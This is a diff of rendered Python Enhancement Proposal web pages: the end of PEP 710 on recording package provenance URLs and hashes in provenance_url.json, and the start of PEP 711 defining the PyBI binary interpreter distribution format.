Recording provenance information for installed distribution packages, +both those obtained from direct URLs and by name/version from an index, +can simplify auditing Python environments in general, beyond just +the specific use case for containerized applications mentioned earlier. +A community project pip-audit raised their possible interest in +pypa/pip-audit#170.

+
+
+

Specification

+

The keywords “MUST”, “MUST NOT”, “REQUIRED”, “SHOULD”, +“SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” +in this document are to be interpreted as described in RFC 2119.

+

The provenance_url.json file SHOULD be created in the .dist-info +directory by installers when installing a Distribution Package +specified by name (and optionally by Version Specifier).

+

This file MUST NOT be created when installing a distribution package from a requirement +specifying a direct URL reference (including a VCS URL).

+

Only one of the files provenance_url.json and direct_url.json (from +Recording the Direct URL Origin of installed distributions specification and the corresponding specification of +the Direct URL Data Structure), +may be present in a given .dist-info directory; installers MUST NOT add +both.

+

The provenance_url.json JSON file MUST be a dictionary, compliant with +RFC 8259 and UTF-8 encoded.

+

If present, it MUST contain exactly two keys. The first MUST be url, with +type string. The second key MUST be archive_info with a value defined +below.

+

The value of the url key MUST be the URL from which the distribution +package was downloaded. If a wheel is built from a source distribution, the +url value MUST be the URL from which the source distribution was +downloaded. If a wheel is downloaded and installed directly, the url field +MUST be the URL from which the wheel was downloaded. As in the Direct URL +Data Structure specification, the url +value MUST be stripped of any sensitive authentication information for security +reasons.

+

The user:password section of the URL MAY however be composed of environment +variables, matching the following regular expression:

+
\$\{[A-Za-z0-9-_]+\}(:\$\{[A-Za-z0-9-_]+\})?
+
+
+

Additionally, the user:password section of the URL MAY be a well-known, +non-security sensitive string. A typical example is git in the case of an +URL such as ssh://git@gitlab.com.
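As a non-normative sketch, a consumer could check a recorded URL against these rules roughly as follows (the helper name is hypothetical; the regular expression is the one given above):

import re
from urllib.parse import urlsplit

ENV_VAR_CRED = re.compile(r"\$\{[A-Za-z0-9-_]+\}(:\$\{[A-Za-z0-9-_]+\})?")

def credentials_ok(url: str, well_known=("git",)) -> bool:
    # Accept URLs with no credentials, a well-known non-sensitive user,
    # or credentials composed purely of ${ENV_VAR} placeholders.
    parts = urlsplit(url)
    if parts.username is None:
        return True
    if parts.username in well_known and parts.password is None:
        return True
    cred = parts.username
    if parts.password is not None:
        cred += ":" + parts.password
    return ENV_VAR_CRED.fullmatch(cred) is not None

assert credentials_ok("ssh://git@gitlab.com/repo.git")
assert credentials_ok("https://${INDEX_USER}:${INDEX_TOKEN}@example.com/simple/")
assert not credentials_ok("https://alice:hunter2@example.com/simple/")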

+

The value of archive_info MUST be a dictionary with a single key +hashes. The value of hashes is a dictionary mapping hash function +names to a hex-encoded digest of the file referenced by the url value. At +least one hash MUST be recorded. Multiple hashes MAY be included, and it is up +to the consumer to decide what to do with multiple hashes (it may validate all +of them or a subset of them, or nothing at all).

+

Each hash MUST be one of the single argument hashes provided by +hashlib.algorithms_guaranteed, excluding sha1 and md5 which MUST NOT be used. +As of Python 3.11, with shake_128 and shake_256 excluded +for being multi-argument, the allowed set of hashes is:

+
>>> import hashlib
+>>> sorted(hashlib.algorithms_guaranteed - {"shake_128", "shake_256", "sha1", "md5"})
+['blake2b', 'blake2s', 'sha224', 'sha256', 'sha384', 'sha3_224', 'sha3_256', 'sha3_384', 'sha3_512', 'sha512']
+
+
+

Each hash MUST be referenced by the canonical name of the hash, always lower case.

+

Hashes sha1 and md5 MUST NOT be present, due to the security +limitations of these hash algorithms. Conversely, hash sha256 SHOULD +be included.
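For example, an installer could compute the hashes mapping with hashlib, keyed by the canonical lower-case hash names (a minimal sketch):

import hashlib

def compute_hashes(path: str, algorithms=("sha256",)) -> dict[str, str]:
    # Returns {canonical hash name: hex-encoded digest} for an artifact,
    # reading the file in chunks to keep memory usage bounded.
    digests = {name: hashlib.new(name) for name in algorithms}
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            for digest in digests.values():
                digest.update(chunk)
    return {name: digest.hexdigest() for name, digest in digests.items()}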

+

Installers that cache distribution packages from an index SHOULD keep +information related to the cached distribution artifact, so that +the provenance_url.json file can be created even when installing distribution packages +from the installer’s cache.
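Putting the pieces of this specification together, an installer might create the file roughly like this (non-normative; the helper name is hypothetical):

import json
import pathlib

def write_provenance_url(dist_info: pathlib.Path, url: str,
                         hashes: dict[str, str]) -> None:
    # Enforce the hash requirements, then write UTF-8 encoded JSON with
    # exactly the two required keys.
    if not hashes:
        raise ValueError("at least one hash MUST be recorded")
    if {"sha1", "md5"} & set(hashes):
        raise ValueError("sha1 and md5 MUST NOT be used")
    document = {"url": url, "archive_info": {"hashes": hashes}}
    (dist_info / "provenance_url.json").write_text(
        json.dumps(document, indent=2, sort_keys=True), encoding="utf-8")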

+
+
+

Backwards Compatibility

+

Following the Recording installed projects specification, +installers may keep additional installer-specific files in the .dist-info +directory. To make sure this PEP does not cause any backwards compatibility +issues, a comprehensive survey of installers and libraries +found no current tools that are using a similarly-named file, +or other major feasibility concerns.

+

The Wheel specification lists files that can be +present in the .dist-info directory. None of these file names collide with +the proposed provenance_url.json file from this PEP.

+
+

Presence of provenance_url.json in installers and libraries

+

A comprehensive survey of the existing installers, libraries, and dependency +managers in the Python ecosystem analyzed the implications of adding support for +provenance_url.json to each tool. +In summary, no major backwards compatibility issues, conflicts or feasibility blockers +were found as of the time of writing of this PEP. More details about the survey +can be found in the Appendix: Survey of installers and libraries section.

+
+
+

Compatibility with direct_url.json

+

This proposal does not make any changes to the direct_url.json file +described in PEP 610 and its corresponding canonical PyPA spec.

+

The content of the provenance_url.json file was designed in a way that eventually allows installers to reuse some of the logic supporting direct_url.json when a direct URL refers to a source archive or a wheel.

+

The main difference between the provenance_url.json and direct_url.json files is the mandatory keys and their values in the provenance_url.json file. This helps make sure consumers of the provenance_url.json file can rely on its content, if the file is present in the .dist-info directory.

+
+
+
+

Security Implications

+

One of the main security features of the provenance_url.json file is the +ability to audit installed artifacts in Python environments. Tools can check +which Python package indexes were used to install Python distribution +packages as well as the hash digests of their release +artifacts.

+

As an example, we can take the recent compromised dependency chain in the PyTorch incident. The PyTorch index provided a package named torchtriton. An attacker published torchtriton on PyPI, which ran a malicious binary. By checking the URL of the installed Python distribution stated in the provenance_url.json file, tools can automatically check the source of the installed Python distribution. In the case of the PyTorch incident, the URL of torchtriton should point to the PyTorch index, not PyPI. Tools can help identify such malicious Python distributions by checking the URL of each installed Python distribution. A more exact check can also include the hash of the installed Python distribution stated in the provenance_url.json file. Such checks on hashes can be helpful for mirrored Python package indexes where Python distributions are not distinguishable by their source URLs, making sure only desired Python package distributions are installed.

+

A malicious actor can intentionally adjust the content of +provenance_url.json to possibly hide provenance information of the +installed Python distribution. A security check which would uncover such +malicious activity is beyond scope of this PEP as it would require monitoring +actions on the filesystem and eventually reviewing user or file permissions.

+
+
+

How to Teach This

+

The provenance_url.json metadata file is intended for tools and is not +directly visible to end users.

+
+
+

Examples

+
+

Examples of a valid provenance_url.json

+

A valid provenance_url.json listing multiple hashes:

+
{
+  "archive_info": {
+    "hashes": {
+      "blake2s": "fffeaf3d0bd71dc960ca2113af890a2f2198f2466f8cd58ce4b77c1fc54601ff",
+      "sha256": "236bcb61156d76c4b8a05821b988c7b8c35bf0da28a4b614e8d6ab5212c25c6f",
+      "sha3_256": "c856930e0f707266d30e5b48c667a843d45e79bb30473c464e92dfa158285eab",
+      "sha512": "6bad5536c30a0b2d5905318a1592948929fbac9baf3bcf2e7faeaf90f445f82bc2b656d0a89070d8a6a9395761f4793c83187bd640c64b2656a112b5be41f73d"
+    }
+  },
+  "url": "https://files.pythonhosted.org/packages/07/51/2c0959c5adf988c44d9e1e0d940f5b074516ecc87e96b1af25f59de9ba38/pip-23.0.1-py3-none-any.whl"
+}
+
+
+

A valid provenance_url.json listing a single hash entry:

+
{
+  "archive_info": {
+    "hashes": {
+      "sha256": "236bcb61156d76c4b8a05821b988c7b8c35bf0da28a4b614e8d6ab5212c25c6f"
+    }
+  },
+  "url": "https://files.pythonhosted.org/packages/07/51/2c0959c5adf988c44d9e1e0d940f5b074516ecc87e96b1af25f59de9ba38/pip-23.0.1-py3-none-any.whl"
+}
+
+
+

A valid provenance_url.json listing a source distribution which was used to +build and install a wheel:

+
{
+  "archive_info": {
+    "hashes": {
+      "sha256": "8bfe29f17c10e2f2e619de8033a07a224058d96b3bfe2ed61777596f7ffd7fa9"
+    }
+  },
+  "url": "https://files.pythonhosted.org/packages/1d/43/ad8ae671de795ec2eafd86515ef9842ab68455009d864c058d0c3dcf680d/micropipenv-0.0.1.tar.gz"
+}
+
+
+
+
+

Examples of an invalid provenance_url.json

+

The following example includes a hash key in the archive_info dictionary as originally designed in the data structure documented in Recording the Direct URL Origin of installed distributions. The hash key MUST NOT be present, to prevent any possible confusion with hashes and the additional checks that would be required to keep the hash values in sync.

+
{
+  "archive_info": {
+    "hash": "sha256=236bcb61156d76c4b8a05821b988c7b8c35bf0da28a4b614e8d6ab5212c25c6f",
+    "hashes": {
+      "sha256": "236bcb61156d76c4b8a05821b988c7b8c35bf0da28a4b614e8d6ab5212c25c6f"
+    }
+  },
+  "url": "https://files.pythonhosted.org/packages/07/51/2c0959c5adf988c44d9e1e0d940f5b074516ecc87e96b1af25f59de9ba38/pip-23.0.1-py3-none-any.whl"
+}
+
+
+

Another example demonstrates an invalid hash name. The referenced hash name does not +correspond to the canonical hash names described in this PEP and +in the Python docs under hashlib.hash.name.

+
{
+  "archive_info": {
+    "hashes": {
+      "SHA-256": "236bcb61156d76c4b8a05821b988c7b8c35bf0da28a4b614e8d6ab5212c25c6f"
+    }
+  },
+  "url": "https://files.pythonhosted.org/packages/07/51/2c0959c5adf988c44d9e1e0d940f5b074516ecc87e96b1af25f59de9ba38/pip-23.0.1-py3-none-any.whl"
+}
+
+
+

The last example demonstrates a provenance_url.json file with no hashes +available for the downloaded artifact:

+
{
+  "archive_info": {
+    "hashes": {}
+  },
+  "url": "https://files.pythonhosted.org/packages/07/51/2c0959c5adf988c44d9e1e0d940f5b074516ecc87e96b1af25f59de9ba38/pip-23.0.1-py3-none-any.whl"
+}
+
+
+
+
+

Example pip commands and their effect on provenance_url.json and direct_url.json

+

These commands generate a direct_url.json file but do not generate a provenance_url.json file. These examples follow the examples given in the Direct URL Data Structure specification:

+
    +
  • pip install https://example.com/app-1.0.tgz
  • +
  • pip install https://example.com/app-1.0.whl
  • +
  • pip install "git+https://example.com/repo/app.git#egg=app&subdirectory=setup"
  • +
  • pip install ./app
  • +
  • pip install file:///home/user/app
  • +
  • pip install --editable "git+https://example.com/repo/app.git#egg=app&subdirectory=setup" (in which case, url will be the local directory where the git repository has been cloned to, and dir_info will be present with "editable": true and no vcs_info will be set)
  • +
  • pip install -e ./app
  • +
+

Commands that generate a provenance_url.json file but do not generate +a direct_url.json file:

+
    +
  • pip install app
  • +
  • pip install app~=2.2.0
  • +
  • pip install app --no-index --find-links "https://example.com/"
  • +
+

This behaviour can be tested using changes to pip implemented in the PR +pypa/pip#11865.

+
+
+
+

Reference Implementation

+

A proof-of-concept for creating the provenance_url.json metadata file when +installing a Python Distribution Package is available in the PR to pip +pypa/pip#11865. It reuses the already available implementation for the +direct URL data structure to +provide the provenance_url.json metadata file for cases when +direct_url.json is not created.

+

A reference implementation for supporting the provenance_url.json file in PDM is available in pdm-project/pdm#3013.

+

A prototype called pip-preserve was developed to demonstrate the creation of requirements.txt files that take the direct_url.json and provenance_url.json metadata files into account. This tool mimics the pip freeze functionality, but the listing of installed packages also includes the hashes of the Python distribution artifacts.
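+
A minimal sketch of the same idea using importlib.metadata follows. This is not pip-preserve’s actual implementation; the requirement-line format simply mirrors pip’s --hash option:

+
import json
+from importlib.metadata import distributions
+
+for dist in distributions():
+    text = dist.read_text("provenance_url.json")
+    if text is None:
+        continue  # no provenance recorded for this distribution
+    hashes = json.loads(text)["archive_info"]["hashes"]
+    pins = " ".join(
+        f"--hash={name}:{digest}" for name, digest in sorted(hashes.items())
+    )
+    print(f"{dist.metadata['Name']}=={dist.version} {pins}")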

+

To further support this proposal, pip-sbom demonstrates the creation of SBOMs in the SPDX format. The tool uses information stored in the provenance_url.json file.

+
+
+

Rejected Ideas

+
+

Naming the file direct_url.json instead of provenance_url.json

+

To preserve backwards compatibility with the Recording the Direct URL Origin of installed distributions specification, the file cannot be named direct_url.json, as per the text of that specification:

+
+
This file MUST NOT be created when installing a distribution from an other +type of requirement (i.e. name plus version specifier).
+

Such a change might introduce backwards compatibility issues for consumers of +direct_url.json who rely on its presence only when distributions are +installed using a direct URL reference.

+
+
+

Deprecating direct_url.json and using only provenance_url.json

+

The direct_url.json file is already well established by the Direct URL Data Structure specification and is already used by installers. For example, pip uses direct_url.json to report a direct URL reference on pip freeze. Deprecating direct_url.json would require additional changes to the pip freeze implementation in pip (see PR fridex/pip#2) and could introduce backwards compatibility issues for existing direct_url.json consumers.

+
+
+

Keeping the hash key in the archive_info dictionary

+

The Direct URL Data Structure specification discusses the possibility of including the hash key alongside the hashes key in the archive_info dictionary. This PEP explicitly does not include the hash key in the provenance_url.json file and allows only the hashes key to be present. By doing so, we eliminate possible redundancy in the file, possible confusion, and any additional checks that would be needed to make sure the hashes are in sync.

+
+
+

Allowing no hashes stated

+

When a wheel file is installed from pip’s cache and was built using an older version of pip, pip does not record hashes of the downloaded source distributions. As hashes of these downloaded source distributions are not available, the hashes key in the provenance_url.json file would not contain any entries. In such cases, pip does not create any provenance_url.json file, as the provenance information is incomplete. Consumers are encouraged to rebuild wheels with a newer version of pip in these cases.

+
+
+

Making the hashes key optional

+

PEP 610 and its corresponding canonical PyPA spec +recommend including the hashes key of the archive_info in the +direct_url.json file but it is not required (per the RFC 2119 language):

+
+
A hashes key SHOULD be present as a dictionary mapping a hash name to a hex +encoded digest of the file.
+

This PEP requires the hashes key be included in archive_info +in the provenance_url.json file if that file is created; per this PEP:

+
+
The value of archive_info MUST be a dictionary with a single key +hashes.
+

By doing so, consumers of provenance_url.json can check +artifact digests when the provenance_url.json file is created by installers.
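+
An illustrative (non-normative) validation of these constraints, assuming canonical hash names follow hashlib’s lowercase naming:

+
import hashlib
+import json
+
+def validate_archive_info(content: str) -> dict:
+    doc = json.loads(content)
+    archive_info = doc["archive_info"]
+    if set(archive_info) != {"hashes"}:
+        raise ValueError("archive_info must hold exactly the 'hashes' key")
+    hashes = archive_info["hashes"]
+    if not hashes:
+        raise ValueError("at least one hash entry is required")
+    for name in hashes:
+        if name != name.lower() or name not in hashlib.algorithms_available:
+            raise ValueError(f"non-canonical hash name: {name}")
+    return hashes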

+
+
+

Storing index URL

+

The possibility of storing the index URL as part of the file content was raised. This index URL would represent the index configured in pip’s configuration or specified using the --index-url or --extra-index-url options. Storing this information was considered confusing, especially when using other installation options like --find-links. Since the actual index URL is not strictly bound to the location from which the wheel file was downloaded, we decided not to store the index URL in the provenance_url.json file.

+
+
+
+

Open Issues

+
+

Availability of the provenance_url.json file in Conda

+

We would like to get feedback on the provenance_url.json file from the Conda maintainers. It is not clear whether Conda would like to adopt the provenance_url.json file. Conda already stores provenance-related information (similar to the provenance information proposed in this PEP) in JSON files located in the conda-meta directory, following its actions during installation.

+
+
+

Using provenance_url.json in downstream installers

+

The proposed provenance_url.json file is meant to be adopted primarily by Python installers. Other installers, such as APT or DNF, might record the provenance of installed downstream Python distributions in their own way, specific to downstream package management. The proposed file is not expected to be created by these downstream package installers, and thus they were intentionally left out of this PEP. However, any input from developers or maintainers of these installers is valuable and could enrich the provenance_url.json file with information useful to them as well.

+
+
+
+

Appendix: Survey of installers and libraries

+
+

pip

+

The function from pip’s internal API responsible for installing wheels, named +_install_wheel, +does not store any provenance_url.json file in the .dist-info +directory. Additionally, a prototype introducing the mentioned file to pip in +pypa/pip#11865 demonstrates incorporating logic for handling the +provenance_url.json file in pip’s source code.

+

As pip is used by some of the tools mentioned below to install Python package distributions, the findings for pip apply to those tools as well, since pip’s internal API does not allow parametrizing the creation of files in the .dist-info directory. Moreover, most of the tools mentioned below that use pip invoke it as a subprocess, which has no effect on the eventual presence of the provenance_url.json file in the .dist-info directory.

+
+
+

distlib

+

distlib implements low-level functionality to manipulate the dist-info directory. Based on distlib’s source code, its database of installed distributions does not use any file named provenance_url.json.

+
+
+

Pipenv

+

Pipenv uses pip to install Python package distributions. No additional logic was identified that would cause backwards compatibility issues when introducing the provenance_url.json file in the .dist-info directory.

+
+
+

installer

+

installer does not create a provenance_url.json file explicitly. Nevertheless, as per the Recording Installed Projects specification, installer allows passing the additional_metadata argument to create a file in the .dist-info directory (see the source code). To avoid backwards compatibility issues, any library or tool using installer must not request creation of a provenance_url.json file via the additional_metadata argument.

+
+
+

Poetry

+

The installation logic in Poetry depends on the +installer.modern-installer configuration option (see docs).

+

For cases when the installer.modern-installer configuration option is set +to false, Poetry uses pip for installing Python package distributions.

+

On the other hand, when the installer.modern-installer configuration option is set to true, Poetry uses installer to install Python package distributions. As can be seen from the linked sources, no additional metadata file named provenance_url.json is passed that would cause compatibility issues with this PEP.

+
+
+

Conda

+

Conda does not create any provenance_url.json file +when Python package distributions are installed.

+
+
+

Hatch

+

Hatch uses pip to install project dependencies.

+
+
+

micropipenv

+

As micropipenv is a wrapper on top of pip, it uses pip to install Python distributions, for both lock files and requirements files.

+
+
+

Thamos

+

Thamos uses micropipenv to install Python package distributions, hence any findings for micropipenv apply to Thamos as well.

+
+
+

PDM

+

PDM uses installer to install binary distributions. The only additional metadata file it may create in the .dist-info directory is the REFER_TO file.

+
+
+

uv

+

uv is written in Rust and uses its own installation logic when installing +wheels. +It does not create any additional files +in the .dist-info directory that would collide with the +provenance_url.json file naming.

+
+
+
+

Acknowledgements

+

Thanks to Dustin Ingram, Brett Cannon, and Paul Moore for the initial discussion in +which this idea originated.

+

Thanks to Donald Stufft, Ofek Lev, and Trishank Kuppusamy for early feedback +and support to work on this PEP.

+

Thanks to Gregory P. Smith, Stéphane Bidoul, and C.A.M. Gerlach for +reviewing this PEP and providing valuable suggestions.

+

Thanks to Seth Michael Larson for providing valuable suggestions and for +the proposed pip-sbom prototype.

+

Thanks to Stéphane Bidoul and Chris Jerdonek for PEP 610, and related +Recording the Direct URL Origin of installed distributions and Direct URL Data Structure specifications.

+

Thanks to Frost Ming for raising possible concern around storing index URL in +the provenance_url.json file and initial PEP 710 support in PDM.

+

Last, but not least, thanks to Donald Stufft for sponsoring this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0710.rst

+

Last modified: 2024-08-03 11:39:19 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0711/index.html b/pep-0711/index.html new file mode 100644 index 00000000000..fb4a0af3837 --- /dev/null +++ b/pep-0711/index.html @@ -0,0 +1,671 @@ + + + + + + + + PEP 711 – PyBI: a standard format for distributing Python Binaries | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 711 – PyBI: a standard format for distributing Python Binaries

+
+
Author:
+
Nathaniel J. Smith <njs at pobox.com>
+
PEP-Delegate:
+
TODO
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
06-Apr-2023
+
Post-History:
+
06-Apr-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

“Like wheels, but instead of a pre-built python package, it’s a +pre-built python interpreter”

+
+
+

Motivation

+

End goal: PyPI.org has pre-built packages for all Python versions on all popular platforms, so automated tools can easily grab any of them and set it up. It becomes quick and easy to try Python prereleases, pin Python versions in CI, make a temporary environment to reproduce a bug report that only happens on a specific Python point release, etc.

+

First step (this PEP): define a standard packaging file format to hold pre-built +Python interpreters, that reuses existing Python packaging standards as much as +possible.

+
+
+

Examples

+

Example pybi builds are available at pybi.vorpus.org. They’re zip files, so you can unpack them and poke +around inside if you want to get a feel for how they’re laid out.

+

You can also look at the tooling I used to create them.

+
+
+

Specification

+
+

Filename

+

Filename: {distribution}-{version}[-{build tag}]-{platform tag}.pybi

+

This matches the wheel file format defined in PEP 427, except dropping the +{python tag} and {abi tag} and changing the extension from .whl → +.pybi.

+

For example:

+
    +
  • cpython-3.9.3-manylinux_2014.pybi
  • +
  • cpython-3.10b2-win_amd64.pybi
  • +
+

Just like for wheels, if a pybi supports multiple platforms, you can +separate them by dots to make a “compressed tag set”:

+
    +
  • cpython-3.9.5-macosx_11_0_x86_64.macosx_11_0_arm64.pybi
  • +
+

(Though in practice this probably won’t be used much, e.g. the above +filename is more idiomatically written as +cpython-3.9.5-macosx_11_0_universal2.pybi.)
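+
A rough sketch of parsing this naming convention (illustrative only; the regex is an assumption and simpler than the full wheel-tag grammar):

+
import re
+
+# distribution-version[-build]-platform(.platform...)*.pybi; build tags
+# start with a digit, and platform tags contain no hyphens.
+PYBI_RE = re.compile(
+    r"^(?P<distribution>[^-]+)-(?P<version>[^-]+)"
+    r"(?:-(?P<build>\d[^-]*))?"
+    r"-(?P<platforms>[^-]+)\.pybi$"
+)
+
+m = PYBI_RE.match("cpython-3.9.5-macosx_11_0_x86_64.macosx_11_0_arm64.pybi")
+assert m is not None
+print(m["distribution"], m["version"], m["platforms"].split("."))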

+
+
+

File contents

+

A .pybi file is a zip file, that can be unpacked directly into an +arbitrary location and then used as a self-contained Python environment. +There’s no .data directory or install scheme keys, because the +Python environment knows which install scheme it’s using, so it can just +put things in the right places to start with.

+

The “arbitrary location” part is important: the pybi can’t contain any +hardcoded absolute paths. In particular, any preinstalled scripts MUST +NOT embed absolute paths in their shebang lines.

+

Similar to wheels’ <package>-<version>.dist-info directory, the pybi archive must contain a top-level directory named pybi-info/. (Rationale: calling it pybi-info instead of dist-info makes sure that tools don’t get confused about which kind of metadata they’re looking at; leaving off the {name}-{version} part is fine because only one pybi can be installed into a given directory.) The pybi-info/ directory contains at least the files listed below; a short sketch of reading this metadata follows the list:

+
    +
  • .../PYBI: metadata about the archive itself, in the same +RFC822-ish format as METADATA and WHEEL files:
    Pybi-Version: 1.0
    +Generator: {name} {version}
    +Tag: {platform tag}
    +Tag: {another platform tag}
    +Tag: {...and so on...}
    +Build: 1   # optional
    +
    +
    +
  • +
  • .../RECORD: same as in wheels, except see the note about +symlinks, below.
  • +
  • .../METADATA: In the same format as described in the current core +metadata spec, except that the following keys are forbidden because +they don’t make sense:
      +
    • Requires-Dist
    • +
    • Provides-Extra
    • +
    • Requires-Python
    • +
    +

    And also there are some new, required keys described below.

    +
  • +
+
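+
A short sketch of consuming such an archive under the layout described above. The filename is hypothetical, and the RFC822-ish PYBI file parses with the stdlib email module:

+
import email
+import zipfile
+
+PYBI = "cpython-3.11.1-manylinux_2_17_x86_64.pybi"  # hypothetical file
+
+with zipfile.ZipFile(PYBI) as zf:
+    zf.extractall("my-env")  # pybis are relocatable: any directory works
+    with zf.open("pybi-info/PYBI") as f:
+        meta = email.message_from_binary_file(f)
+
+print(meta["Pybi-Version"], meta.get_all("Tag"))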
+

Pybi-specific core metadata

+

Here’s an example of the new METADATA fields, before we give the full details:

+
Pybi-Environment-Marker-Variables: {"implementation_name": "cpython", "implementation_version": "3.10.8", "os_name": "posix", "platform_machine": "x86_64", "platform_system": "Linux", "python_full_version": "3.10.8", "platform_python_implementation": "CPython", "python_version": "3.10", "sys_platform": "linux"}
+Pybi-Paths: {"stdlib": "lib/python3.10", "platstdlib": "lib/python3.10", "purelib": "lib/python3.10/site-packages", "platlib": "lib/python3.10/site-packages", "include": "include/python3.10", "platinclude": "include/python3.10", "scripts": "bin", "data": "."}
+Pybi-Wheel-Tag: cp310-cp310-PLATFORM
+Pybi-Wheel-Tag: cp310-abi3-PLATFORM
+Pybi-Wheel-Tag: cp310-none-PLATFORM
+Pybi-Wheel-Tag: cp39-abi3-PLATFORM
+Pybi-Wheel-Tag: cp38-abi3-PLATFORM
+Pybi-Wheel-Tag: cp37-abi3-PLATFORM
+Pybi-Wheel-Tag: cp36-abi3-PLATFORM
+Pybi-Wheel-Tag: cp35-abi3-PLATFORM
+Pybi-Wheel-Tag: cp34-abi3-PLATFORM
+Pybi-Wheel-Tag: cp33-abi3-PLATFORM
+Pybi-Wheel-Tag: cp32-abi3-PLATFORM
+Pybi-Wheel-Tag: py310-none-PLATFORM
+Pybi-Wheel-Tag: py3-none-PLATFORM
+Pybi-Wheel-Tag: py39-none-PLATFORM
+Pybi-Wheel-Tag: py38-none-PLATFORM
+Pybi-Wheel-Tag: py37-none-PLATFORM
+Pybi-Wheel-Tag: py36-none-PLATFORM
+Pybi-Wheel-Tag: py35-none-PLATFORM
+Pybi-Wheel-Tag: py34-none-PLATFORM
+Pybi-Wheel-Tag: py33-none-PLATFORM
+Pybi-Wheel-Tag: py32-none-PLATFORM
+Pybi-Wheel-Tag: py31-none-PLATFORM
+Pybi-Wheel-Tag: py30-none-PLATFORM
+Pybi-Wheel-Tag: py310-none-any
+Pybi-Wheel-Tag: py3-none-any
+Pybi-Wheel-Tag: py39-none-any
+Pybi-Wheel-Tag: py38-none-any
+Pybi-Wheel-Tag: py37-none-any
+Pybi-Wheel-Tag: py36-none-any
+Pybi-Wheel-Tag: py35-none-any
+Pybi-Wheel-Tag: py34-none-any
+Pybi-Wheel-Tag: py33-none-any
+Pybi-Wheel-Tag: py32-none-any
+Pybi-Wheel-Tag: py31-none-any
+Pybi-Wheel-Tag: py30-none-any
+
+
+

Specification:

+
    +
  • Pybi-Environment-Marker-Variables: The value of all PEP 508 +environment marker variables that are static across installs of this +Pybi, as a JSON dict. So for example:
      +
    • python_version will always be present, because a Python 3.10 package +always has python_version == "3.10".
    • +
    • platform_version will generally not be present, because it gives +detailed information about the OS where Python is running, for example:
      #60-Ubuntu SMP Thu May 6 07:46:32 UTC 2021
      +
      +
      +

      platform_release has similar issues.

      +
    • +
    • platform_machine will usually be present, except for macOS universal2 +pybis: these can potentially be run in either x86-64 or arm64 mode, and we +don’t know which until the interpreter is actually invoked, so we can’t +record it in static metadata.
    • +
    +

    Rationale: In many cases, this should allow a resolver running on Linux +to compute package pins for a Python environment on Windows, or vice-versa, +so long as the resolver has access to the target platform’s .pybi file. (Note +that Requires-Python constraints can be checked by using the +python_full_version value.) While we have to leave out a few keys +sometimes, they’re either fairly useless (platform_version, +platform_release) or can be reconstructed by the resolver +(platform_machine).

    +

    The markers are also just generally useful information to have +accessible. For example, if you have a pypy3-7.3.2 pybi, and you +want to know what version of the Python language that supports, then +that’s recorded in the python_version marker.

    +

    (Note: we may want to deprecate/remove platform_version and +platform_release? They’re problematic and I can’t figure out any cases +where they’re useful. But that’s out of scope of this particular PEP.)

    +
  • +
  • Pybi-Paths: The install paths needed to install wheels (same keys +as sysconfig.get_paths()), as relative paths starting at the root +of the zip file, as a JSON dict.

    These paths MUST be written in Unix format, using forward slashes as +a separator, not backslashes.

    +

    It must be possible to invoke the Python interpreter by running +{paths["scripts"]}/python. If there are alternative interpreter +entry points (e.g. pythonw for Windows GUI apps), then they +should also be in that directory under their conventional names, with +no version number attached. (You can also have a python3.11 +symlink if you want; there’s no rule against that. It’s just that +python has to exist and work.)

    +

    Rationale: Pybi-Paths and Pybi-Wheel-Tags (see below) are +together enough to let an installer choose wheels and install them into an +unpacked pybi environment, without invoking Python. Besides, we need to write +down the interpreter location somewhere, so it’s two birds with one stone.

    +
  • +
  • Pybi-Wheel-Tag: The wheel tags supported by this interpreter, in +preference order (most-preferred first, least-preferred last), except +that the special platform tag PLATFORM should replace any +platform tags that depend on the final installation system.

    Discussion: It would be nice™ if installers could compute a pybi’s +corresponding wheel tags ahead of time, so that they could install +wheels into the unpacked pybi without needing to actually invoke the +python interpreter to query its tags – both for efficiency and to +allow for more exotic use cases like setting up a Windows environment +from a Linux host.

    +

    But unfortunately, it’s impossible to compute the full set of +platform tags supported by a Python installation ahead of time, +because they can depend on the final system:

    +
      +
    • A pybi tagged manylinux_2_12_x86_64 can always use wheels +tagged as manylinux_2_12_x86_64. It also might be able to +use wheels tagged manylinux_2_17_x86_64, but only if the final +installation system has glibc 2.17+.
    • +
    • A pybi tagged macosx_11_0_universal2 (= x86-64 + arm64 support +in the same binary) might be able to use wheels tagged as +macosx_11_0_arm64, but only if it’s installed on an “Apple +Silicon” machine and running in arm64 mode.
    • +
    +

    In these two cases, an installation tool can still work out the +appropriate set of wheel tags by computing the local platform tags, +taking the wheel tag templates from Pybi-Wheel-Tag, and swapping +in the actual supported platforms in place of the magic PLATFORM +string.

    +

    However, there are other cases that are even more complicated:

    +
      +
    • +
      You can (usually) run both 32- and 64-bit apps on 64-bit Windows. So a pybi
      installer might compute the set of allowable pybi tags on the current +platform as [win32, win_amd64]. But you can’t then just take that +set and swap it into the pybi’s wheel tag template or you get nonsense:
      [
      +  "cp39-cp39-win32",
      +  "cp39-cp39-win_amd64",
      +  "cp39-abi3-win32",
      +  "cp39-abi3-win_amd64",
      +  ...
      +]
      +
      +
      +

      To handle this, the installer needs to somehow understand that a +manylinux_2_12_x86_64 pybi can use a manylinux_2_17_x86_64 wheel +as long as those are both valid tags on the current machine, but a +win32 pybi can’t use a win_amd64 wheel, even if those are both +valid tags on the current machine.

      +
      +
      +
    • +
    • A pybi tagged macosx_11_0_universal2 might be able to use +wheels tagged as macosx_11_0_x86_64, but only if it’s +installed on an x86-64 machine or it’s installed on an ARM +machine and the interpreter is invoked with the magic +incantation that tells macOS to run a binary in x86-64 mode. So +how the installer plans to invoke the pybi matters too!
    • +
    +

